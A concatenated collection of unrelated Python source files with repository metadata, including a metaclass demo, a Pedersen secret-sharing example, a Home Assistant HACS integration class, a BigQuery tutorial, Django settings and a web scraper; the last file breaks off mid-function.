23bcdebc6312f35fb67216dff2380ccbe74890ab | 68215f224dd76f8bf299c66c80cb4a0de1a05a20 | /PythonTutorial/Advance/MetaClass/meta_class_example2.py | 2e013f02ffac5c75fa0acaf6a410b099a0bd7425 | [] | no_license | jhappye/Python-Study | 3935e1d9ffead3afb1b39823a4114006094a6542 | 40a421980e9f56a97f6f7b9eb00bbf983ee12c5b | refs/heads/master | 2023-08-30T17:36:26.313896 | 2021-11-16T09:53:39 | 2021-11-16T09:53:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | # 常规方法创建
class Foo:
pass
# Conventional class creation
class Bar(Foo):
attr = 100
x = Foo()
print(x)
# Dynamic creation, equivalent to the definition above
Bar = type('Bar', (Foo,), dict(attr=100))
x = Bar()
print(x)
print(type(x))
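# Note: type(name, bases, namespace) is the three-argument form of type(); it
# builds and returns a new class object at runtime, which is what the class
# statement itself does under the hood.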
| [
"[email protected]"
] | |
76a14a2500ada13704b7d69ed40d39c206497011 | 680db028bdfd570688e66009dd41a424b2395a6e | /Camelcase.py | 51a76dd0a42b6afcae6e169004a153a3dac0257b | [] | no_license | vitcmaestro/player | 46fcf3138a7ba98a3aadae60aebdd68efdd16c55 | 8b9b132ec5f3dfe22521daf6122431451db8d880 | refs/heads/master | 2020-04-15T16:43:53.944347 | 2019-01-20T05:00:31 | 2019-01-20T05:00:31 | 164,848,284 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | str1 = input("")
str2 =""
for i in range(len(str1)):
if(i==0):
str2 +=str1[i].upper()
elif(str1[i-1].isspace()):
str2 +=str1[i].upper()
else:
str2 +=str1[i]
print(str2)
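# Example: input "hello world" -> prints "Hello World" (the first character and
# every character that follows a space are upper-cased).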
| [
"[email protected]"
] | |
149488d35576cf1a5937c6f95ae55ab3c88828d9 | 837d683ccf6aa08b0ad6d95f6af47fcc12b72da3 | /pedersen_vss.py | 586d0dff4ce73808e4596e669d77272e83f15f10 | [] | no_license | froyobin/secretsharing | deef2cdb9be72ff51be339bfaae4822e351b8cf1 | 737f2aa074e0cb6f082916bd11afc658732777e1 | refs/heads/master | 2021-01-11T21:32:12.720629 | 2017-01-20T00:46:31 | 2017-01-20T00:46:31 | 78,798,569 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,479 | py | import argparse
import shamir_secret_sharing
from Crypto.Util import number
# To keep things simple, we use f(x) = 5 + 3x + 8x^2 as the example
# parameters; that makes the code easy to test and to write.
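# Background (a sketch of the scheme as implemented below): the dealer commits
# to each pair of coefficients (a_j, b_j) of the two polynomials with
#     C_j = g**a_j * h**b_j (mod p),
# and share holder i then checks its share pair (s_i, t_i) against
#     prod_j C_j**(i**j) == g**s_i * h**t_i (mod p),
# which is what create_verifies() and verifies_shares() implement.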
p = int(
"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF",
16)
g = 2
h = int(
"3d941d6d9cd4c77719840d6b391a63ca6ded5b5cf6aafeefb9ea530f523039e9c372736a79b7eb022e50029f7f2cb4fb16fd1def75657288eca90d2c880f306be76fe0341b3c8961ae6e61aabbb60e416069d97eeada2f1408f2017449dddcd5ac927f164b1a379727941bd7f2170d02ef12ef3ec801fae585ac7b9d4079f50feced64687128208d46e3e10c5d78eb05832f5322c07a3b4e14c6f595206fde99115e8eea19b5fb13dd434332ec3eccb41a4baa54a14183c3416313678697db8507abdcfc6a97c86099fa5172316d784c6997fc2e74e8e59c7c1bc90426164682f5bfbf6373b13ea90d7e13fbffd65e10c4ad96c38ccbf8e8def28d76746729dc",
16)
def create_verifies(params1, params2, p, g, h):
verifies = []
for i in range(0, len(params1)):
verifies.append((pow(g, params1[i], p) * pow(h, params2[i], p)) % p)
return verifies
def verify_each(i, verifies, len_params):
    left_value = 1
    for j in range(0, len_params):
        upper = pow(i, j, p)
        left_value *= pow(verifies[j], upper, p)
    return left_value % p
def calculate_left(verfies, i, t, p):
powerall = [1]
for each_t in range(1, t):
powerall.append(pow(i, each_t))
left_val = 1
for j in range(0, len(verfies)):
c = pow(verfies[j], powerall[j], p)
left_val *= c
left_val %= p
return left_val % p
def verifies_shares(secrets1, secrets2, verifies, params,p,g):
for i in range(0, len(secrets1)):
left_value = calculate_left(verifies, i+1, len(params), p)
right_value = (pow(g, (secrets1[i])%p, p)*pow(h, (secrets2[i])%p, p))%p
if left_value == right_value:
print "checking %d Successfully!!" % i
else:
print "secret %d has been modified!!" % i
def test_prime():
n_length = 2048
q= (p-1)%2
print q
print number.isPrime((p-1)/2)
primeNum1 = number.getPrime(n_length)
# primeNum2 = number.getStrongPrime(n_length, primeNum1)
i=2
while True:
pl = p-1
print i
if pl%i == 0:
if number.isPrime(pl / i):
print "############"
print i
print "############"
break
i += 1
if i==10000:
break
print "found!!"
print "############################"
print primeNum1
print "############################"
def main(args):
s = shamir_secret_sharing.StringtoInt(args.secret)
parties = int(args.party)
min_party = int(args.min_party)
params1 = shamir_secret_sharing.create_params(s, min_party, p)
params2 = shamir_secret_sharing.create_params(s, min_party, p)
secrets1 = shamir_secret_sharing.create_secret(parties, params1, p)
secrets2 = shamir_secret_sharing.create_secret(parties, params2, p)
secret = shamir_secret_sharing.construct_secret(secrets1, min_party, p)
verifies = create_verifies(params1, params2, p, g, h)
verifies_shares(secrets1, secrets2, verifies, params2, p, g)
print "The secret you give is " + str(params1[0]) + "\n"
print "The rejoin code is " + str(secret)
if params1[0] == secret:
print "rejoin Successfully!!"
else:
print "we cannot rejoin the secret"
    # Tamper with secrets2[3] and confirm that verification detects the modified share
secrets2[3] -= 1
verifies_shares(secrets1, secrets2, verifies, params2, p, g)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Create secret shares')
parser.add_argument('secret', metavar='\"secret\"', type=str,
help='the secret to share')
parser.add_argument('party', metavar='\"secret\"', type=str,
help='the secret to share')
parser.add_argument('min_party', metavar='\"secret\"', type=str,
help='the secret to share')
args = parser.parse_args()
main(args)
| [
"[email protected]"
] | |
32e1da53f66f709ec826c5e6e98b69f964055011 | 644bcdabf35261e07c2abed75986d70f736cb414 | /python-project/Defis/Euler_44_Test.py | 059d736f3c4546ec361ff33f1fc9b32183c5bd48 | [] | no_license | matcianfa/playground-X1rXTswJ | f967ab2c2cf3905becafb6d77e89a31414d014de | 67859b496e407200afb2b1d2b32bba5ed0fcc3f0 | refs/heads/master | 2023-04-03T11:56:15.878757 | 2023-03-24T15:52:37 | 2023-03-24T15:52:37 | 122,226,979 | 5 | 20 | null | null | null | null | UTF-8 | Python | false | false | 1,110 | py | #Ne pas oublier de changer le module à importer
module="Defis/Euler_44"
import sys
import io
# Capture the user's output
sauvegarde_stdout=sys.stdout
sys.stdout=io.StringIO()
from Euler_44 import *
count1 = sys.stdout.getvalue()[:-1]
sys.stdout=sauvegarde_stdout
from ma_bao import *
# The expected answer
reponse=5482660
# Help message, if needed
help="N'oublie pas d'utiliser print pour afficher le resultat"
def send_msg(channel, msg):
print("TECHIO> message --channel \"{}\" \"{}\"".format(channel, msg))
def success():
send_msg("Tests validés","Bravo !")
afficher_correction(module)
print("TECHIO> success true")
def fail():
print("TECHIO> success false")
def test():
try:
assert str(count1) == str(reponse), "Le résultat obtenu est {} mais ce n'est pas le bon.".format(str(count1))
send_msg("Tests validés","Le résultat cherché est bien {}".format(str(count1)))
success()
except AssertionError as e:
fail()
send_msg("Oops! ", e)
if help:
send_msg("Aide 💡", help)
if __name__ == "__main__": test()
| [
"[email protected]"
] | |
07e8af6fb34efbf28fd13da8b7998358fa68674c | f9c2e53c48839fe5583f6da48e800eba793f83c8 | /custom_components/hacs/repositories/integration.py | 8470873279f13b52e25cd0fb77a631d30b168ab2 | [] | no_license | Bobo2012/homeassistant-config | d6a5ebdd8de978d14a5d060ad77975280efdf95e | ee2567182e3ef250ee2a2e1a403fbc6f27057861 | refs/heads/master | 2020-08-21T20:04:53.531610 | 2019-10-18T22:59:54 | 2019-10-18T22:59:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,501 | py | """Class for integrations in HACS."""
import json
from aiogithubapi import AIOGitHubException
from homeassistant.loader import async_get_custom_components
from .repository import HacsRepository, register_repository_class
@register_repository_class
class HacsIntegration(HacsRepository):
"""Integrations in HACS."""
category = "integration"
def __init__(self, full_name):
"""Initialize."""
super().__init__()
self.information.full_name = full_name
self.information.category = self.category
self.manifest = None
self.domain = None
self.content.path.remote = "custom_components"
self.content.path.local = self.localpath
@property
def localpath(self):
"""Return localpath."""
return f"{self.system.config_path}/custom_components/{self.domain}"
@property
def config_flow(self):
"""Return bool if integration has config_flow."""
if self.manifest is not None:
if self.information.full_name == "custom-components/hacs":
return False
return self.manifest.get("config_flow", False)
return False
async def validate_repository(self):
"""Validate."""
await self.common_validate()
# Attach repository
if self.repository_object is None:
self.repository_object = await self.github.get_repo(
self.information.full_name
)
# Custom step 1: Validate content.
if self.repository_manifest:
if self.repository_manifest.content_in_root:
self.content.path.remote = ""
if self.content.path.remote == "custom_components":
ccdir = await self.repository_object.get_contents(
self.content.path.remote, self.ref
)
if not isinstance(ccdir, list):
self.validate.errors.append("Repostitory structure not compliant")
for item in ccdir or []:
if item.type == "dir":
self.content.path.remote = item.path
break
if self.repository_manifest.zip_release:
self.content.objects = self.releases.last_release_object.assets
else:
self.content.objects = await self.repository_object.get_contents(
self.content.path.remote, self.ref
)
self.content.files = []
for filename in self.content.objects or []:
self.content.files.append(filename.name)
if not await self.get_manifest():
self.validate.errors.append("Missing manifest file.")
# Handle potential errors
if self.validate.errors:
for error in self.validate.errors:
if not self.system.status.startup:
self.logger.error(error)
return self.validate.success
async def registration(self):
"""Registration."""
if not await self.validate_repository():
return False
# Run common registration steps.
await self.common_registration()
# Get the content of the manifest file.
await self.get_manifest()
# Set local path
self.content.path.local = self.localpath
async def update_repository(self):
"""Update."""
await self.common_update()
# Get integration objects.
if self.repository_manifest:
if self.repository_manifest.content_in_root:
self.content.path.remote = ""
if self.content.path.remote == "custom_components":
ccdir = await self.repository_object.get_contents(
self.content.path.remote, self.ref
)
if not isinstance(ccdir, list):
self.validate.errors.append("Repostitory structure not compliant")
self.content.path.remote = ccdir[0].path
try:
self.content.objects = await self.repository_object.get_contents(
self.content.path.remote, self.ref
)
except AIOGitHubException:
return
self.content.files = []
for filename in self.content.objects or []:
self.content.files.append(filename.name)
await self.get_manifest()
# Set local path
self.content.path.local = self.localpath
async def reload_custom_components(self):
"""Reload custom_components (and config flows)in HA."""
self.logger.info("Reloading custom_component cache")
del self.hass.data["custom_components"]
await async_get_custom_components(self.hass)
async def get_manifest(self):
"""Get info from the manifest file."""
manifest_path = f"{self.content.path.remote}/manifest.json"
try:
manifest = await self.repository_object.get_contents(
manifest_path, self.ref
)
manifest = json.loads(manifest.content)
except Exception: # pylint: disable=broad-except
return False
if manifest:
self.manifest = manifest
self.information.authors = manifest["codeowners"]
self.domain = manifest["domain"]
self.information.name = manifest["name"]
self.information.homeassistant_version = manifest.get("homeassistant")
# Set local path
self.content.path.local = self.localpath
return True
return False
| [
"[email protected]"
] | |
d95810328bbed890c7daf776a9675beedc3d8cd2 | 473568bf080e3637ee118b374f77e9f561286c6c | /SudoPlacementCourse/LeadersInAnArray.py | b2b997ace46a797ad0dd241ff7cd5667a35adba3 | [] | no_license | VineetPrasadVerma/GeeksForGeeks | c2f7fc94b0a07ba146025ca8a786581dbf7154c8 | fdb4e4a7e742c4d67015977e3fbd5d35b213534f | refs/heads/master | 2020-06-02T11:23:11.421399 | 2020-01-07T16:51:18 | 2020-01-07T16:51:18 | 191,138,925 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,241 | py | # n = int(input())
#
# for k in range(n):
# final_ans_list = []
# size_of_array = int(input())
# list_of_elements = input()
#
# int_list_of_elements = [int(i) for i in list_of_elements.split()]
#
# for i in range(len(int_list_of_elements)):
# if i == len(int_list_of_elements) - 1:
# final_ans_list.append(int_list_of_elements[i])
# break
#
# max_element = int_list_of_elements[i]
# temp_max_element = max(int_list_of_elements[i+1:])
#
# if max_element >= temp_max_element:
# final_ans_list.append(int_list_of_elements[i])
#
# string_list_of_elements = [str(i) for i in final_ans_list]
# print(" ".join(string_list_of_elements))
n = int(input())
for _ in range(n):
final_ans_list = []
size_of_array = int(input())
list_of_elements = input()
int_list_of_elements = [int(i) for i in list_of_elements.split()]
maximum = -1
for i in range(len(int_list_of_elements)-1, -1, -1):
if int_list_of_elements[i] >= maximum:
maximum = int_list_of_elements[i]
final_ans_list.append(maximum)
for i in range(len(final_ans_list)-1, -1, -1):
print(final_ans_list[i], end=" ")
print()
| [
"[email protected]"
] | |
8294fce530b848259f949592831c9de1c760dbad | 14a913fce4b538b22f28409645cd6abe3455808f | /bigquery/cloud-client/natality_tutorial.py | 5bfa8f1d27a9736075f271b77657e9342df6d688 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | iamLoi/Python-Random-Number-Generator | 8da7dbd37cb13a01232c8ed49b9df35a99c63d73 | 7579e8b15130802aaf519979e475c6c75c403eda | refs/heads/master | 2022-08-29T19:05:32.649931 | 2019-09-14T14:48:58 | 2019-09-14T14:48:58 | 208,454,877 | 2 | 1 | Apache-2.0 | 2022-08-05T21:57:49 | 2019-09-14T14:51:05 | Python | UTF-8 | Python | false | false | 2,926 | py | #!/usr/bin/env python
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def run_natality_tutorial():
# [START bigquery_query_natality_tutorial]
"""Create a Google BigQuery linear regression input table.
In the code below, the following actions are taken:
* A new dataset is created "natality_regression."
* A query is run against the public dataset,
bigquery-public-data.samples.natality, selecting only the data of
interest to the regression, the output of which is stored in a new
"regression_input" table.
* The output table is moved over the wire to the user's default project via
the built-in BigQuery Connector for Spark that bridges BigQuery and
Cloud Dataproc.
"""
from google.cloud import bigquery
# Create a new Google BigQuery client using Google Cloud Platform project
# defaults.
client = bigquery.Client()
# Prepare a reference to a new dataset for storing the query results.
dataset_ref = client.dataset('natality_regression')
dataset = bigquery.Dataset(dataset_ref)
# Create the new BigQuery dataset.
dataset = client.create_dataset(dataset)
# In the new BigQuery dataset, create a reference to a new table for
# storing the query results.
table_ref = dataset.table('regression_input')
# Configure the query job.
job_config = bigquery.QueryJobConfig()
# Set the destination table to the table reference created above.
job_config.destination = table_ref
# Set up a query in Standard SQL, which is the default for the BigQuery
# Python client library.
# The query selects the fields of interest.
query = """
SELECT
weight_pounds, mother_age, father_age, gestation_weeks,
weight_gain_pounds, apgar_5min
FROM
`bigquery-public-data.samples.natality`
WHERE
weight_pounds IS NOT NULL
AND mother_age IS NOT NULL
AND father_age IS NOT NULL
AND gestation_weeks IS NOT NULL
AND weight_gain_pounds IS NOT NULL
AND apgar_5min IS NOT NULL
"""
# Run the query.
query_job = client.query(query, job_config=job_config)
query_job.result() # Waits for the query to finish
# [END bigquery_query_natality_tutorial]
if __name__ == '__main__':
run_natality_tutorial()
| [
"[email protected]"
] | |
0618850a5db7746378ebd7c6d18fc84b9305a5e3 | 05324b134108e0e0fde392e0ae0fc22bfa1fb75f | /df_user/islogin.py | d2149c4633a4871adc7f90b232f8ccc8e25afcec | [] | no_license | 2339379789/zhang_ttshop | 2c8d546b9ed3710fd1f48d6075ea01955247d34f | 44f9eb998182f4aa027d5d313b4957410b54a39d | refs/heads/master | 2020-03-06T15:40:54.261769 | 2018-03-27T09:23:52 | 2018-03-27T09:23:52 | 126,960,140 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | from django.http import HttpResponseRedirect
def islogin(func):
def login_fun(request, *args, **kwargs):
if request.session.get('user_id'):
return func(request, *args, **kwargs)
else:
red = HttpResponseRedirect('/user/login')
            red.set_cookie('url', request.get_full_path())
return red
return login_fun
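# Example usage (hypothetical view; the decorator redirects anonymous users to
# /user/login and remembers the requested URL in a cookie):
#   @islogin
#   def user_center(request):
#       ...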
| [
"[email protected]"
] | |
fcdd844f805ea4a7bd79824935397e4ae355b4f3 | 62e58c051128baef9452e7e0eb0b5a83367add26 | /x12/4052/354004052.py | c318eb1028c5e6c2d9a7772e6ec4c9f7cf7069da | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 453 | py | from bots.botsconfig import *
from records004052 import recorddefs
syntax = {
'version' : '00403', #version of ISA to send
'functionalgroup' : 'AY',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'M10', MIN: 1, MAX: 1},
{ID: 'P4', MIN: 1, MAX: 20, LEVEL: [
{ID: 'X01', MIN: 1, MAX: 1},
{ID: 'X02', MIN: 0, MAX: 9999},
]},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
| [
"[email protected]"
] | |
c3b06571705e3d42ea421dbcc6cb94538267f247 | 078533ce919371451564646e3c311c8dd6fca7ea | /app/settings/prod.py | 1425b25dbaa062e89c3c39a5947da1224923cd03 | [] | no_license | cr8ivecodesmith/djdraft | cf5415a967dc7fc6f4f8d191def9c2b687c0d744 | 364ded3ea43acc874de367cd679c4bddfb64d837 | refs/heads/master | 2020-04-05T23:07:20.690873 | 2016-10-06T05:11:29 | 2016-10-06T05:11:29 | 23,010,461 | 2 | 1 | null | 2016-10-03T13:42:04 | 2014-08-16T04:17:23 | Python | UTF-8 | Python | false | false | 1,558 | py | from .base import *
DEBUG = False
ALLOWED_HOSTS = [
'{{ project_name }}.dev',
]
###### APP CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS += [
]
###### DATABASE CONFIGURATION
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'caffeinedb',
'USER': 'caffeine',
'PASSWORD': 'changeme',
'HOST': 'postgres',
'PORT': 5432,
}
}
########## EMAIL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/topics/email/#smtp-backend
EMAIL_BACKEND = 'django_smtp_ssl.SSLEmailBackend'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-user
EMAIL_HOST_USER = get_key('EMAIL_HOST_USER')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-password
EMAIL_HOST_PASSWORD = get_key('EMAIL_HOST_PASSWORD')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host
EMAIL_HOST = 'smtp.{{ project_name }}.dev'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-port
EMAIL_PORT = 465
SERVER_EMAIL = 'errors@{{ project_name }}.dev'
DEFAULT_FROM_EMAIL = 'noreply@{{ project_name }}.dev'
###### MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS += [
('caffeine prod', 'errors@{{ project_name }}.dev'),
]
###### CELERY CONFIGURATION
# CELERY_ROUTES = {
# 'app.tasks.example_queue': {
# 'queue': 'express_queue'
# },
# }
| [
"[email protected]"
] | |
0af0e6aeb4bf93bb5c2c00acba6daf1feb4788c2 | 0566cf76b456518875edecece15e763a36a4795f | /scrapers/tv_showsonline_com.py | 6208f8a041fec633df9bb9e2989a3db26e001ce2 | [] | no_license | theclonedude/Scraping_BeautifulSoup_phantomjs | 684b1f7a993e0d2555daa7a5455cf19bd29b0b1b | faf653feae46c21a72d13b2123cdebdb2f7c05d8 | refs/heads/master | 2023-03-16T19:36:14.867361 | 2018-06-14T14:21:02 | 2018-06-14T14:21:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,148 | py |
from sandcrawler.scraper import ScraperBase
from sandcrawler.scraper import SimpleScraperBase
class TvShowsOnline(SimpleScraperBase):
BASE_URL = 'http://www.7stream.pro/'
OTHER_URLS = ['http://tv-showsonline.com', ]
def setup(self):
self.register_scraper_type(ScraperBase.SCRAPER_TYPE_OSP)
self.search_term_language = 'eng'
raise NotImplementedError('the website returns the bad gateway error')
self.register_media(ScraperBase.MEDIA_TYPE_FILM)
self.register_media(ScraperBase.MEDIA_TYPE_TV)
for url in [self.BASE_URL, ] + self.OTHER_URLS:
self.register_url(ScraperBase.URL_TYPE_SEARCH, url)
self.register_url(ScraperBase.URL_TYPE_LISTING, url)
def _fetch_search_url(self, search_term, media_type):
        return self.BASE_URL + '/?s=' + self.util.quote(search_term)
def _fetch_no_results_text(self):
return 'No Articles Found'
def _fetch_next_button(self, soup):
link = soup.select_one('a[class="next page-numbers"]')
self.log.debug(link)
self.log.debug('------------------------')
return link['href'] if link else None
def _parse_search_result_page(self, soup):
results = soup.select('div.item_content h4 a')
if not results or len(results) == 0:
return self.submit_search_no_results()
for result in results:
self.submit_search_result(
link_url = result['href'],
link_title = result.text
)
def _parse_parse_page(self, soup):
title = soup.select_one('h1[class="entry_title entry-title"]').text.strip()
season, episode = self.util.extract_season_episode(title)
titles = soup.select('span.ser-name')
index = 0
for link in soup.select('a.wo-btn'):
self.submit_parse_result(
index_page_title = self.util.get_page_title(soup),
link_url=link['href'],
link_title=titles[index].text,
series_season=season,
series_episode=episode
)
index += 1
| [
"[email protected]"
] | |
585c1f38e68fa896e9f1b91523d7cde15f833d05 | 544fe02a27cc4d987724b1bf45c2ba2994676521 | /Q6.3_brain_teasers.py | c42fb93923fdbb832381c85a4fbe252f28b128c3 | [
"Unlicense"
] | permissive | latika18/learning | 1e7a6dbdea399b845970317dc62089911a13df1c | a57c9aacc0157bf7c318f46c1e7c4971d1d55aea | refs/heads/master | 2021-06-16T19:20:28.146547 | 2019-09-03T06:43:28 | 2019-09-03T06:43:28 | 115,537,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 524 | py | #You have a five quart jug and a three quart jug, and an unlimited supply of water (but no measuring cups).
# How would you come up with exactly four quarts of water?
# NOTE: The jugs are oddly shaped, such that filling up exactly ‘half’ of the jug would be impossible.
#
# ________________________________________________________________
# 5 Quart Contents | 3 Quart Contents | Note
# 5                | 0                | Filled 5 quart jug
# 2                | 3                | Filled 3Q with 5Q’s contents
# 0                | 2                | Dumped 3Q
# 5                | 2                | Filled 5Q
# 4                | 3                | Fill remainder of 3Q with 5Q
# 4                | 3                | Done! We have four quarts
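# A minimal sketch (illustrative; `pour` is a hypothetical helper, not part of
# the original notes) that replays the pours above and checks the result:
def pour(src, dst, dst_cap):
    # Pour src into dst until src is empty or dst is full.
    moved = min(src, dst_cap - dst)
    return src - moved, dst + moved
five, three = 5, 0                  # fill the 5-quart jug
five, three = pour(five, three, 3)  # fill 3Q from 5Q -> (2, 3)
three = 0                           # dump the 3-quart jug
five, three = pour(five, three, 3)  # pour the 2 quarts into 3Q -> (0, 2)
five = 5                            # refill the 5-quart jug
five, three = pour(five, three, 3)  # top off 3Q -> (4, 3)
assert five == 4                    # exactly four quarts in the 5-quart jug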
| [
"[email protected]"
] | |
e2e7d5b9b92f7a0b1b6801b43db9c95bca9229f0 | 1d159ff6d4d72b1a2399916ec1e28ef885b59323 | /solutions/module_3/01_guess_my_number.py | 4b9c9b119b0c1c64362318c3850d074b0c21f484 | [] | no_license | Zerl1990/python_essentials | 4e329b6e36b36ff340d505b26608d2b244ad2d09 | ce257c25072debed9717960591e39c586edd7110 | refs/heads/master | 2023-02-28T17:42:17.465769 | 2021-02-02T23:39:41 | 2021-02-02T23:39:41 | 297,385,479 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 884 | py | import random
print((
"+=========================================+\n"
"| Guess my number! |\n"
"| Please, select a numbers between [0-100]|\n"
"| Let's start you have 10 opportunities |\n"
"+=========================================+\n"
))
my_number = random.randint(0, 100)
opportunities = 0
max_opportunities = 10
guess = -1
win = False
while not win and opportunities < max_opportunities:
guess = int(input('What is the number?: '))
win = (my_number == guess)
opportunities += 1
if my_number < guess:
print(f'[---] My number is less than {guess}')
elif my_number > guess:
print(f'[+++] My number is greater than {guess}')
else:
print('You found my number!')
if win:
print(f'It only took {opportunities} opportunities, you have won!!!')
else:
print("Better luck next time")
| [
"[email protected]"
] | |
3972d6d7840538ecae880e9e1fda6b25c54b8bb0 | db12b990924703cd74748d8585cd9c11fafa6746 | /h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2oas_list.py | 3e7ec87a09dad726385a034be07e5ed147db3d49 | [
"Apache-2.0"
] | permissive | h2oai/h2o-3 | 919019a8f297eec676011a9cfd2cc2d97891ce14 | d817ab90c8c47f6787604a0b9639b66234158228 | refs/heads/master | 2023-08-17T18:50:17.732191 | 2023-08-17T16:44:42 | 2023-08-17T16:44:42 | 17,371,412 | 6,872 | 2,345 | Apache-2.0 | 2023-09-14T18:05:40 | 2014-03-03T16:08:07 | Jupyter Notebook | UTF-8 | Python | false | false | 727 | py | import sys
sys.path.insert(1,"../../../")
from tests import pyunit_utils
import h2o
from h2o.utils.typechecks import assert_is_type
def h2oas_list():
"""
Python API test: h2o.as_list(data, use_pandas=True, header=True)
Copied from pyunit_frame_as_list.py
"""
iris = h2o.import_file(path=pyunit_utils.locate("smalldata/iris/iris_wheader.csv"))
res1 = h2o.as_list(iris, use_pandas=False)
assert_is_type(res1, list)
res1 = list(zip(*res1))
assert abs(float(res1[0][9]) - 4.4) < 1e-10 and abs(float(res1[1][9]) - 2.9) < 1e-10 and \
abs(float(res1[2][9]) - 1.4) < 1e-10, "incorrect values"
if __name__ == "__main__":
pyunit_utils.standalone_test(h2oas_list)
else:
h2oas_list()
| [
"[email protected]"
] | |
c79d336c33025ee87041b0924dfe4af9287a02f3 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03087/s875530520.py | c6f926255e87de91fe2fee869e4c531b1ffd87e1 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | N, Q = map(int, input().split())
S = str(input())
li = []
cnt = 0
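# li[i] counts "AC" pairs whose 'A' lies at 1-indexed position <= i + 1
# (a prefix sum over adjacent pairs); each query [l, r] is then answered
# by differencing two prefix values below.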
for i in range(N-1):
    if S[i]=='A' and S[i+1]=='C':
        cnt += 1
    li.append(cnt)
for i in range(Q):
l, r = map(int, input().split())
if l > 1:
ans = li[r-2] - li[l-2]
else:
ans = li[r-2]
print(ans)
| [
"[email protected]"
] | |
16d806ed7bb7721136f1534dbe98b1aaa13ec985 | b15c47a45207e854fb002d69f7e33f8943a5e2b3 | /cluster/preprocess/pre_node_merge_text2seq.py | c25a02debf845bcb7cf7835b41e46d424efd847a | [
"Apache-2.0"
] | permissive | yurimkoo/tensormsa | e1af71c00a6b2ec3b3ed35d5adad7bafc34c6fbe | 6ad2fbc7384e4dbe7e3e63bdb44c8ce0387f4b7f | refs/heads/master | 2021-07-22T13:41:45.110348 | 2017-11-02T07:13:31 | 2017-11-02T07:13:31 | 109,469,204 | 1 | 0 | null | 2017-11-04T05:19:51 | 2017-11-04T05:19:50 | null | UTF-8 | Python | false | false | 2,165 | py | from cluster.preprocess.pre_node import PreProcessNode
from master.workflow.preprocess.workflow_pre_merge import WorkFlowPreMerge as WFPreMerge
class PreNodeMergeText2Seq(PreProcessNode):
"""
"""
def run(self, conf_data):
return True
def _init_node_parm(self, key):
"""
:return:
"""
wf_conf = WFPreMerge(key)
self.batch_size = wf_conf.get_batchsize()
self.merge_rule = wf_conf.get_merge_rule()
self.merge_type = wf_conf.get_type()
self.state_code = wf_conf.get_state_code()
def _set_progress_state(self):
pass
def load_data(self, node_id, parm = 'all'):
"""
load train data
:param node_id:
:param parm:
:return:
"""
self._init_node_parm(node_id)
if(self.merge_type == 'seq2seq') :
return self._merge_seq2seq_type()
else :
raise Exception ("merge node error: not defined type {0}".format(self.merge_type))
def _merge_seq2seq_type(self):
"""
        merge two data nodes into one for seq2seq analysis
:return:
"""
file_lists = []
encode_data = []
encode_node_list = self.merge_rule['encode_node']
if (len(encode_node_list) > 0):
for node_name in encode_node_list:
cls_path, cls_name = self.get_cluster_exec_class(str(self.state_code) + "_" + node_name)
dyna_cls = self.load_class(cls_path, cls_name)
encode_data = encode_data + dyna_cls.load_data(self.state_code + "_" + node_name, parm='all')
file_lists.append(encode_data)
decode_data = []
decode_node_list = self.merge_rule['decode_node']
if (len(decode_node_list) > 0):
for node_name in decode_node_list:
